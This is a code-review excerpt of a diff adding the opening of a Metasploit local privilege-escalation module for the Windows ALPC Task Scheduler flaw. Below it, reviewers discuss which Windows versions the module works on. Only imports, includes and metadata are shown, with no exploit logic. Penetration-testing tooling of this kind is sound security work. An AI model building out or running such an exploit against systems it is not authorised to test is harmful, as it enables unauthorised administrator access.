modules/exploits/windows/local/alpc_taskscheduler.rb

```diff
@@ -0,0 +1,194 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/post/common'
+require 'msf/core/post/file'
+require 'msf/core/post/windows/priv'
+require 'msf/core/post/windows/registry'         #TODO: Do we need this?
+require 'msf/core/exploit/exe'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::Common
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+  include Msf::Exploit::EXE
+  include Msf::Post::Windows::ReflectiveDLLInjection
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Microsoft Windows ALPC Task Scheduler Local Privilege Elevation',
+      'Description'    => %q(
+        #TODO
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'SandboxEscaper',       # Original discovery and PoC
+          'bwatters-r7',          # msf module
+          'asoto-r7',             # msf module
+          'Jacob Robles'          # msf module
+        ],
+      'Platform'       => ['win'],
+      'SessionTypes'   => ['meterpreter','shell'],    #TODO: syntax for shell?
+      'Targets'        =>
+        [
+          ['Windows x64', { 'Arch' => ARCH_X64 }]
```

Comment:
From my original testing I wasn't able to get this method working on Windows 7 (though I admit to not trying very hard). Pretty sure we can get it to work though. Have you had the chance to test it on something other than Windows 10?

Reply:
I just tested Windows 7 and it wasn't working. I'll see if I can fix that.

Reply:
It does work on Windows server 2012 & I assume it makes senses that it won't run on Windows 7 32bit